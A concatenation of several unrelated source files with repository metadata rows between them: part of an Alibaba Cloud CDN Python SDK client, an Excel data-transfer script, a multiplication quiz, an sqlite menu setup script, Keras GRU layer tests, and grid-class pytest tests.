            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='OpenCdnService',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.OpenCdnServiceResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def open_cdn_service(
        self,
        request: cdn_20141111_models.OpenCdnServiceRequest,
    ) -> cdn_20141111_models.OpenCdnServiceResponse:
        """Call the CDN ``OpenCdnService`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.open_cdn_service_with_options(request, runtime)
    async def open_cdn_service_async(
        self,
        request: cdn_20141111_models.OpenCdnServiceRequest,
    ) -> cdn_20141111_models.OpenCdnServiceResponse:
        """Async call of the CDN ``OpenCdnService`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.open_cdn_service_with_options_async(request, runtime)
    def push_object_cache_with_options(
        self,
        request: cdn_20141111_models.PushObjectCacheRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.PushObjectCacheResponse:
        """Synchronously call the CDN ``PushObjectCache`` RPC with explicit *runtime* options.

        Returns the deserialized ``PushObjectCacheResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.area):
            query['Area'] = request.area
        if not UtilClient.is_unset(request.object_path):
            query['ObjectPath'] = request.object_path
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='PushObjectCache',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.PushObjectCacheResponse(),
            self.call_api(params, req, runtime)
        )
    async def push_object_cache_with_options_async(
        self,
        request: cdn_20141111_models.PushObjectCacheRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.PushObjectCacheResponse:
        """Asynchronous variant of ``push_object_cache_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.area):
            query['Area'] = request.area
        if not UtilClient.is_unset(request.object_path):
            query['ObjectPath'] = request.object_path
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='PushObjectCache',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.PushObjectCacheResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def push_object_cache(
        self,
        request: cdn_20141111_models.PushObjectCacheRequest,
    ) -> cdn_20141111_models.PushObjectCacheResponse:
        """Call the CDN ``PushObjectCache`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.push_object_cache_with_options(request, runtime)
    async def push_object_cache_async(
        self,
        request: cdn_20141111_models.PushObjectCacheRequest,
    ) -> cdn_20141111_models.PushObjectCacheResponse:
        """Async call of the CDN ``PushObjectCache`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.push_object_cache_with_options_async(request, runtime)
    def refresh_object_caches_with_options(
        self,
        request: cdn_20141111_models.RefreshObjectCachesRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.RefreshObjectCachesResponse:
        """Synchronously call the CDN ``RefreshObjectCaches`` RPC with explicit *runtime* options.

        Returns the deserialized ``RefreshObjectCachesResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.object_path):
            query['ObjectPath'] = request.object_path
        if not UtilClient.is_unset(request.object_type):
            query['ObjectType'] = request.object_type
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='RefreshObjectCaches',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.RefreshObjectCachesResponse(),
            self.call_api(params, req, runtime)
        )
    async def refresh_object_caches_with_options_async(
        self,
        request: cdn_20141111_models.RefreshObjectCachesRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.RefreshObjectCachesResponse:
        """Asynchronous variant of ``refresh_object_caches_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.object_path):
            query['ObjectPath'] = request.object_path
        if not UtilClient.is_unset(request.object_type):
            query['ObjectType'] = request.object_type
        if not UtilClient.is_unset(request.owner_id):
            query['OwnerId'] = request.owner_id
        if not UtilClient.is_unset(request.security_token):
            query['SecurityToken'] = request.security_token
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='RefreshObjectCaches',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.RefreshObjectCachesResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def refresh_object_caches(
        self,
        request: cdn_20141111_models.RefreshObjectCachesRequest,
    ) -> cdn_20141111_models.RefreshObjectCachesResponse:
        """Call the CDN ``RefreshObjectCaches`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.refresh_object_caches_with_options(request, runtime)
    async def refresh_object_caches_async(
        self,
        request: cdn_20141111_models.RefreshObjectCachesRequest,
    ) -> cdn_20141111_models.RefreshObjectCachesResponse:
        """Async call of the CDN ``RefreshObjectCaches`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.refresh_object_caches_with_options_async(request, runtime)
    def test_describe_domain_bps_data_with_options(
        self,
        request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
        """Synchronously call the CDN ``TestDescribeDomainBpsData`` RPC with explicit *runtime* options.

        Returns the deserialized ``TestDescribeDomainBpsDataResponse``.
        """
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.domain_type):
            query['DomainType'] = request.domain_type
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.interval):
            query['Interval'] = request.interval
        if not UtilClient.is_unset(request.isp_name_en):
            query['IspNameEn'] = request.isp_name_en
        if not UtilClient.is_unset(request.location_name_en):
            query['LocationNameEn'] = request.location_name_en
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        if not UtilClient.is_unset(request.time_merge):
            query['TimeMerge'] = request.time_merge
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='TestDescribeDomainBpsData',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.TestDescribeDomainBpsDataResponse(),
            self.call_api(params, req, runtime)
        )
    async def test_describe_domain_bps_data_with_options_async(
        self,
        request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
        runtime: util_models.RuntimeOptions,
    ) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
        """Asynchronous variant of ``test_describe_domain_bps_data_with_options``."""
        UtilClient.validate_model(request)
        query = {}
        # Forward only the parameters the caller explicitly set on the request.
        if not UtilClient.is_unset(request.domain_name):
            query['DomainName'] = request.domain_name
        if not UtilClient.is_unset(request.domain_type):
            query['DomainType'] = request.domain_type
        if not UtilClient.is_unset(request.end_time):
            query['EndTime'] = request.end_time
        if not UtilClient.is_unset(request.interval):
            query['Interval'] = request.interval
        if not UtilClient.is_unset(request.isp_name_en):
            query['IspNameEn'] = request.isp_name_en
        if not UtilClient.is_unset(request.location_name_en):
            query['LocationNameEn'] = request.location_name_en
        if not UtilClient.is_unset(request.start_time):
            query['StartTime'] = request.start_time
        if not UtilClient.is_unset(request.time_merge):
            query['TimeMerge'] = request.time_merge
        req = open_api_models.OpenApiRequest(
            query=OpenApiUtilClient.query(query)
        )
        params = open_api_models.Params(
            action='TestDescribeDomainBpsData',
            version='2014-11-11',
            protocol='HTTPS',
            pathname='/',
            method='POST',
            auth_type='AK',
            style='RPC',
            req_body_type='formData',
            body_type='json'
        )
        return TeaCore.from_map(
            cdn_20141111_models.TestDescribeDomainBpsDataResponse(),
            await self.call_api_async(params, req, runtime)
        )
    def test_describe_domain_bps_data(
        self,
        request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
    ) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
        """Call the CDN ``TestDescribeDomainBpsData`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return self.test_describe_domain_bps_data_with_options(request, runtime)
    async def test_describe_domain_bps_data_async(
        self,
        request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
    ) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
        """Async call of the CDN ``TestDescribeDomainBpsData`` RPC with default runtime options."""
        runtime = util_models.RuntimeOptions()
        return await self.test_describe_domain_bps_data_with_options_async(request, runtime)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
a481bdd3a1a74bf95361e1226dd78bdd78fb27f1 | d088bd6e31a64affda073ddc902fa77a4a8a4e0d | /handdle.py | bdb3dd7f2351c6828d19dfa471ea453027eacd86 | [] | no_license | fangtang0101/python-data | a21def51bf73a3e30b256b4512d0c3a53431d233 | edbae51267d025fd938ee6478de6497a2e63a3fc | refs/heads/master | 2020-04-07T12:26:27.180146 | 2018-03-07T09:55:59 | 2018-03-07T09:55:59 | 124,211,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,248 | py | #-*-coding:utf-8 -*-
import os
import string
import shutil
import xlrd
import sys
import chardet
from xlutils.copy import copy
import json
import xlwt
import sys
# Step 2: transfer the corresponding data into the matching workbook files.
path_or = "source_or"  # directory holding the pristine source workbooks
path_tar = "source"    # working copy that the script modifies
# Per-workbook configuration: the model file to edit, the sheet name used to
# look up its correspondence data, and the source/target column indices.
list_info ={
    "content": [
        {
            "path":"./source/model/西餐厅.xls",
            "key_sheet_name":"西餐厅",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/茶餐厅.xls",
            "key_sheet_name":"茶餐厅",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/D5.xls",
            "key_sheet_name":"D5",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/D4.xls",
            "key_sheet_name":"D4",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/小弄堂.xls",
            "key_sheet_name":"小弄堂",
            "col_source":2,
            "col_target":2
        },
        {
            "path":"./source/model/A2.xls",
            "key_sheet_name":"A2",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/37#.xls",
            "key_sheet_name":"37#",
            "col_source":2,
            "col_target":3
        },
        {
            "path":"./source/model/A3.xls",
            "key_sheet_name":"A3",
            "col_source":2,
            "col_target":3
        }
    ]
}
def get_string_split(str_):
    """Return *str_* with every whitespace character (spaces, tabs, newlines) removed."""
    return "".join(str_.split())
def copy_file(path_form, path_to):
    """Replace the directory tree at *path_to* with a copy of *path_form*.

    Any existing *path_to* directory is deleted first so that copytree can
    recreate it.  Bug fix: the original implementation ignored both
    arguments and always copied the hard-coded "source_or" directory to
    "source"; it now honours its parameters.
    """
    path_to = path_to.strip()
    path_to = path_to.rstrip("\\")
    isExists = os.path.exists(path_to)
    print("file exist", isExists)
    if isExists:
        shutil.rmtree(path_to)  # delete the stale target tree
        print("success delete file name is ", path_to)
    shutil.copytree(path_form, path_to)
    print("success copy file ...")
def fix_data():
    # Placeholder: data-repair step is not implemented yet (never called below).
    pass
# get data in corresponding xls
def get_data_corresponding(item):
    """Collect (cell_temp, cell_data) pairs from the correspondence workbook.

    Opens the fixed workbook "对应数据_名称.xls", reads the sheet named by
    ``item["key_sheet_name"]`` and, skipping the header row, returns a list
    of ``{'cell_temp': ..., 'cell_data': ...}`` dicts for every row where
    both column index 2 and column index 3 hold non-blank strings.

    Cleanup: removed the dead locals ``list_temp``, ``sheets`` and ``cols``
    of the original (``book.sheets()`` forced a needless scan of every
    sheet in the workbook).
    """
    book = xlrd.open_workbook("对应数据_名称.xls", formatting_info=True)
    sheet_item = book.sheet_by_name(item["key_sheet_name"])
    col_target = 2  # column holding 'cell_temp'; 'cell_data' sits one to the right
    list_cell = []
    for row in range(1, sheet_item.nrows):  # row 0 is the header
        cell_temp = sheet_item.cell_value(row, col_target)
        cell_data = sheet_item.cell_value(row, col_target + 1)
        if cell_temp.strip() != '' and cell_data.strip() != '':
            list_cell.append({'cell_temp': cell_temp, 'cell_data': cell_data})
    return list_cell
def filled_data(item,list_all):
    """Write each matched 'cell_temp' value into the workbook at ``item["path"]``.

    For every entry of *list_all*, column index 2 of the workbook's first
    sheet is scanned (whitespace-insensitively, via get_string_split) for a
    cell equal to the entry's 'cell_data'; the first matching row is
    remembered, and the entry's 'cell_temp' is then written 10 columns to
    the right of the match with a yellow highlight.  Entries with no match
    are reported on stdout.  The workbook is saved back to the same path.
    """
    target_path_model = item["path"]
    key_sheet_name = item["key_sheet_name"]
    rb = xlrd.open_workbook(target_path_model,formatting_info=True)
    wb = copy(rb)
    ws = wb.get_sheet(0)
    sheet_readonly = rb.sheet_by_index(0)
    # note...... must use sheet_by_index
    rows = sheet_readonly.nrows
    cols = sheet_readonly.ncols
    col_target = 2
    # Configure the yellow fill style used to highlight the written cells.
    pattern = xlwt.Pattern() # Create the Pattern
    pattern.pattern = xlwt.Pattern.SOLID_PATTERN # May be: NO_PATTERN, SOLID_PATTERN, or 0x00 through 0x12
    pattern.pattern_fore_colour = 5 # May be: 8 through 63. 0 = Black, 1 = White, 2 = Red, 3 = Green, 4 = Blue, 5 = Yellow, 6 = Magenta, 7 = Cyan, 16 = Maroon, 17 = Dark Green, 18 = Dark Blue, 19 = Dark Yellow , almost brown), 20 = Dark Magenta, 21 = Teal, 22 = Light Gray, 23 = Dark Gray, the list goes on...
    style = xlwt.XFStyle() # Create the Pattern
    style.pattern = pattern # Add Pattern to Style
    # First pass: record, for each entry, the first row whose key cell matches.
    for data in list_all:
        for row in range(1,rows):
            cell = sheet_readonly.cell_value(row,col_target)
            if get_string_split(cell) == get_string_split(data["cell_data"]):
                data["row"] = row
                data["col"] = col_target
                break
    # Second pass: write matched values; report entries that found no row.
    for obj in list_all:
        if 'row' in obj :
            # ws.write(obj['row'], obj['col'], obj['cell_temp'],style)
            ws.write(obj['row'], obj['col']+10, obj['cell_temp'],style)
        else:
            print(item["key_sheet_name"],"connt find ... ",obj)
    wb.save(target_path_model)
# Step 1: reset the working directory from the pristine originals.
copy_file(path_or,path_tar)
# Step 2: for every configured workbook, read its correspondence data and
# write the matched values into the model file.
for item in list_info["content"]:
    list_data_item = get_data_corresponding(item)
    filled_data(item,list_data_item)
    print("finished ...",item["key_sheet_name"])
| [
"fangchungao@rltx.com"
] | fangchungao@rltx.com |
f8fb78b34913903cdd4e7dbecf2b63afad70b866 | b19a1baf69d1f7ba05a02ace7dfcba15c8d47cfb | /my_random.py | 1a36aadaabd3e30ae66d3858d940a5fa861897f8 | [] | no_license | MarkHofstetter/20191018-wifi-python | 20ed5de1cf28996902cecf7cd681d054e0d06739 | 7427b896783059a77c541e95df851a492ef5ebb9 | refs/heads/master | 2020-08-15T03:43:42.964992 | 2019-10-28T14:39:17 | 2019-10-28T14:39:17 | 215,275,139 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | # kopfrechen
# Mental-arithmetic trainer: the user is shown two different random numbers,
# each in the range 1-10, and has to enter their product; every answer is
# checked, and after the chosen number of rounds a right/wrong tally and the
# percentage of correct answers are printed.
import random
from util import user_input_positive_number

wrong = 0
right = 0
# Number of rounds to play (kept in its own variable; the original reused
# 'user_input' for both the round count and each answer).
rounds = user_input_positive_number(question='Wieviele Runden')
for i in range(rounds):
    print(i)
    m1 = random.randint(1, 10)
    m2 = random.randint(1, 10)
    print(str(m1) + ' mal ' + str(m2) + ' ergibt?')
    product = m1 * m2
    answer = user_input_positive_number('Bitte eine Lösung eingeben: ')
    if product == answer:
        print("Richtig!")
        right += 1
    else:
        print("Falsch!")
        wrong += 1
print('Richtig: ' + str(right))
print('Falsch: ' + str(wrong))
# Bug fix: the original computed right/(i+1), which raised a NameError when
# zero rounds were requested (loop variable 'i' never bound).
total = right + wrong
if total:
    print('Korrekt {:0.2f} %'.format(right / total * 100))
else:
    print('Korrekt 0.00 %')
| [
"mark@hofstetter.at"
] | mark@hofstetter.at |
d332b3dd09b91c5e952ba6af93587d2050fea535 | f20d9ff8aafb8ef2d3e4a14b1d055be7c1a1e0db | /create_database.py | 1c4848520b8d61043baad8f24786a792f0988323 | [] | no_license | HopeCheung/menu_api | 25fee2d807e86245bc547c753a8bc156d99b9962 | bfb410bfe5cd686e237f937f64bac198e178c75e | refs/heads/master | 2020-05-09T20:59:49.467719 | 2019-04-15T17:42:24 | 2019-04-15T17:42:24 | 181,426,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import os
import sqlite3

# Seed data: (id, menu category, menu item).
MENU_ROWS = [
    (1, "Lunch Specials", "Chicken"),
    (2, "Dinner Specials", "Pork"),
    (3, "Specials of the day", "Salad"),
    (1, "Lunch Specials", "Beef"),
    (2, "Dinner Specials", "Sheep"),
    (3, "Specials of the day", "Vegetables"),
]

conn = sqlite3.connect("menu.db")
# IF NOT EXISTS keeps the script re-runnable (the original crashed on a
# second run because the table already existed).
conn.execute('create table if not exists menu (id int, name varchar(20), item varchar(20))')
cur = conn.cursor()
# Parameterized bulk insert instead of six literal SQL statements.
cur.executemany('insert into menu values(?, ?, ?)', MENU_ROWS)
conn.commit()
cur.execute("select * from menu")
print(cur.fetchall())
conn.close()
| [
"568038810@qq.com"
] | 568038810@qq.com |
2f00b65bb0196e3aa1f07c30430bc2e692b9861d | 5476559c5a1b2d45533da87f0d4919cc97a41d5c | /map_objects/tile.py | 1fca69ba8f3e9574b7da022c03c3b6ff56bcb938 | [] | no_license | sheekthief/RoguelikeAdventure | c56044ea9671cfbe598a65dc794e79147258c9e1 | 9d12639ec499543da61b3b6d0231787b7399ddb4 | refs/heads/master | 2020-05-07T21:02:24.499353 | 2019-04-11T22:49:44 | 2019-04-11T22:49:44 | 180,888,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py |
class Tile:
    """A single map tile, which may block movement and/or line of sight."""

    def __init__(self, blocked, block_sight=None):
        self.blocked = blocked
        self.explored = False
        # A tile that blocks movement also blocks sight unless told otherwise.
        self.block_sight = blocked if block_sight is None else block_sight
| [
"noreply@github.com"
] | noreply@github.com |
3f2df8afaad5f9ab52f07effc22cd98efdca27fd | 1da709080d0cc12f58a15d9ea1aa1e3c8511b0ad | /HW 4/hw4_TempSolver.py | ad26fb46f86a6f9b13e17b261faf3e5bbfa48c30 | [] | no_license | Avd6977/me701 | 75b2462229d2852e42443632d3cba8f351f01725 | 8888825389758f7691b18176a219ea76ab8ff3a3 | refs/heads/master | 2020-05-18T15:27:24.151420 | 2014-11-26T01:37:33 | 2014-11-26T01:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | # Test of the F2PY module
from hw4 import *
# Case 1: Dirichlet conditions -- temperature fixed at both boundaries.
print "Dirilicht conditions (temperature at both sides defined)"
tempsolver.tempsolve(1, 1, 100, 0, 100, 0, 0)
print "\n"
# Case 2: left-side temperature and spatial derivative prescribed.
print "Left side temperature and spatial derivative defined"
tempsolver.tempsolve(1.5, 2, 500, 1.5, 0, 0, 1)
print "\n"
# Case 3: right-side temperature and spatial derivative prescribed.
print "Right side temperature and spatial derivative defined"
tempsolver.tempsolve(2.05, -4, 0, 0, 290, -5, 2)
| [
"Avd@ksu.edu"
] | Avd@ksu.edu |
36d309841dbe245ef49c789e87285f004a3dd0c7 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/python/keras/_impl/keras/layers/gru_test.py | 48e7e14f5ab73b534ab0d1c765ad2572b2930b2b | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 7,280 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GRU layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import test_util as tf_test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.keras._impl.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
class GRULayerTest(test.TestCase):
  """Unit tests covering the Keras GRU recurrent layer."""

  @tf_test_util.run_in_graph_and_eager_modes()
  def test_return_sequences_GRU(self):
    # Layer should build and run when asked to emit the full output sequence.
    num_samples = 2
    timesteps = 3
    embedding_dim = 4
    units = 2
    testing_utils.layer_test(
        keras.layers.GRU,
        kwargs={'units': units,
                'return_sequences': True},
        input_shape=(num_samples, timesteps, embedding_dim))

  @tf_test_util.run_in_graph_and_eager_modes()
  def test_dynamic_behavior_GRU(self):
    # A GRU built with an unknown time dimension (None) should still train.
    num_samples = 2
    timesteps = 3
    embedding_dim = 4
    units = 2
    layer = keras.layers.GRU(units, input_shape=(None, embedding_dim))
    model = keras.models.Sequential()
    model.add(layer)
    model.compile(RMSPropOptimizer(0.01), 'mse')
    x = np.random.random((num_samples, timesteps, embedding_dim))
    y = np.random.random((num_samples, units))
    model.train_on_batch(x, y)

  @tf_test_util.run_in_graph_and_eager_modes()
  def test_dropout_GRU(self):
    # Smoke test with both input dropout and recurrent dropout enabled.
    num_samples = 2
    timesteps = 3
    embedding_dim = 4
    units = 2
    testing_utils.layer_test(
        keras.layers.GRU,
        kwargs={'units': units,
                'dropout': 0.1,
                'recurrent_dropout': 0.1},
        input_shape=(num_samples, timesteps, embedding_dim))

  @tf_test_util.run_in_graph_and_eager_modes()
  def test_implementation_mode_GRU(self):
    # All three kernel `implementation` modes must be usable.
    num_samples = 2
    timesteps = 3
    embedding_dim = 4
    units = 2
    for mode in [0, 1, 2]:
      testing_utils.layer_test(
          keras.layers.GRU,
          kwargs={'units': units,
                  'implementation': mode},
          input_shape=(num_samples, timesteps, embedding_dim))

  def test_statefulness_GRU(self):
    # Verifies stateful behavior: state carries across predict calls, can be
    # reset at both the layer and model level, and interacts with masking.
    num_samples = 2
    timesteps = 3
    embedding_dim = 4
    units = 2
    layer_class = keras.layers.GRU
    with self.test_session():
      model = keras.models.Sequential()
      model.add(
          keras.layers.Embedding(
              4,
              embedding_dim,
              mask_zero=True,
              input_length=timesteps,
              batch_input_shape=(num_samples, timesteps)))
      layer = layer_class(
          units, return_sequences=False, stateful=True, weights=None)
      model.add(layer)
      model.compile(optimizer='sgd', loss='mse')
      out1 = model.predict(np.ones((num_samples, timesteps)))
      self.assertEqual(out1.shape, (num_samples, units))
      # train once so that the states change
      model.train_on_batch(
          np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
      out2 = model.predict(np.ones((num_samples, timesteps)))
      # if the state is not reset, output should be different
      self.assertNotEqual(out1.max(), out2.max())
      # check that output changes after states are reset
      # (even though the model itself didn't change)
      layer.reset_states()
      out3 = model.predict(np.ones((num_samples, timesteps)))
      self.assertNotEqual(out2.max(), out3.max())
      # check that container-level reset_states() works
      model.reset_states()
      out4 = model.predict(np.ones((num_samples, timesteps)))
      np.testing.assert_allclose(out3, out4, atol=1e-5)
      # check that the call to `predict` updated the states
      out5 = model.predict(np.ones((num_samples, timesteps)))
      self.assertNotEqual(out4.max(), out5.max())
      # Check masking
      layer.reset_states()
      left_padded_input = np.ones((num_samples, timesteps))
      left_padded_input[0, :1] = 0
      left_padded_input[1, :2] = 0
      out6 = model.predict(left_padded_input)
      layer.reset_states()
      right_padded_input = np.ones((num_samples, timesteps))
      right_padded_input[0, -1:] = 0
      right_padded_input[1, -2:] = 0
      out7 = model.predict(right_padded_input)
      # Masked (zero) steps must not affect the final state, so left- and
      # right-padded inputs should produce the same output.
      np.testing.assert_allclose(out7, out6, atol=1e-5)

  def test_regularizers_GRU(self):
    # The three weight regularizers create 3 losses at build time; the
    # activity regularizer contributes one more loss per call.
    embedding_dim = 4
    layer_class = keras.layers.GRU
    with self.test_session():
      layer = layer_class(
          5,
          return_sequences=False,
          weights=None,
          input_shape=(None, embedding_dim),
          kernel_regularizer=keras.regularizers.l1(0.01),
          recurrent_regularizer=keras.regularizers.l1(0.01),
          bias_regularizer='l2',
          activity_regularizer='l1')
      layer.build((None, None, 2))
      self.assertEqual(len(layer.losses), 3)
      x = keras.backend.variable(np.ones((2, 3, 2)))
      layer(x)
      self.assertEqual(len(layer.get_losses_for(x)), 1)

  def test_constraints_GRU(self):
    # Constraints passed to the layer must be attached to the cell's weights.
    embedding_dim = 4
    layer_class = keras.layers.GRU
    with self.test_session():
      k_constraint = keras.constraints.max_norm(0.01)
      r_constraint = keras.constraints.max_norm(0.01)
      b_constraint = keras.constraints.max_norm(0.01)
      layer = layer_class(
          5,
          return_sequences=False,
          weights=None,
          input_shape=(None, embedding_dim),
          kernel_constraint=k_constraint,
          recurrent_constraint=r_constraint,
          bias_constraint=b_constraint)
      layer.build((None, None, embedding_dim))
      self.assertEqual(layer.cell.kernel.constraint, k_constraint)
      self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
      self.assertEqual(layer.cell.bias.constraint, b_constraint)

  def test_with_masking_layer_GRU(self):
    # GRU should train end-to-end when placed behind a Masking layer.
    layer_class = keras.layers.GRU
    with self.test_session():
      inputs = np.random.random((2, 3, 4))
      targets = np.abs(np.random.random((2, 3, 5)))
      targets /= targets.sum(axis=-1, keepdims=True)
      model = keras.models.Sequential()
      model.add(keras.layers.Masking(input_shape=(3, 4)))
      model.add(layer_class(units=5, return_sequences=True, unroll=False))
      model.compile(loss='categorical_crossentropy', optimizer='adam')
      model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)

  def test_from_config_GRU(self):
    # get_config/from_config must round-trip, with and without statefulness.
    layer_class = keras.layers.GRU
    for stateful in (False, True):
      l1 = layer_class(units=1, stateful=stateful)
      l2 = layer_class.from_config(l1.get_config())
      assert l1.get_config() == l2.get_config()
if __name__ == '__main__':
  test.main()  # run the full test suite when executed directly
| [
"zylo117@hotmail.com"
] | zylo117@hotmail.com |
7f6219a3f5413f7f8ccc9a6748aee73c9408722c | 8cb5b2e2a84252403ca2cd271c4a227eba1ae003 | /test_grid.py | c0800c9d451513546124d95ce0cedd82e442a760 | [] | no_license | barnybug/aoc2018 | e2e972e984b807bae55ca0914de2fbb197ac8a91 | a98d8992ccc4a7cc3d49084fb179665ff5bba605 | refs/heads/master | 2020-04-09T07:29:54.204975 | 2019-01-07T20:18:30 | 2019-01-07T20:18:30 | 160,158,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | import collections
from grid import DenseGrid, SparseGrid
def test_empty_grid():
    # A freshly created DenseGrid renders as the empty string.
    g = DenseGrid()
    assert str(g) == ''
def test_grid_set():
    # DenseGrid rendering: '.' fills unset cells; the origin shifts so the
    # smallest set coordinate becomes the top-left corner.
    # NOTE(review): a second function with this exact name is defined below,
    # shadowing this one, so this DenseGrid test is never collected by pytest.
    g = DenseGrid()
    g[1,1] = 'A'
    assert str(g) == 'A'
    g[2,1] = 'B'
    assert str(g) == 'AB'
    g[2,2] = 'C'
    assert str(g) == 'AB\n.C'
    g[-1,1] = 'Z'
    assert str(g) == 'Z.AB\n...C'
def test_sparse_grid_set():
    """SparseGrid rendering mirrors DenseGrid: '.' fills unset cells.

    Renamed from the duplicate `test_grid_set`: this second definition used
    to shadow the DenseGrid variant above, so that test silently never ran.
    """
    g = SparseGrid()
    g[1,1] = 'A'
    assert str(g) == 'A'
    g[2,1] = 'B'
    assert str(g) == 'AB'
    g[2,2] = 'C'
    assert str(g) == 'AB\n.C'
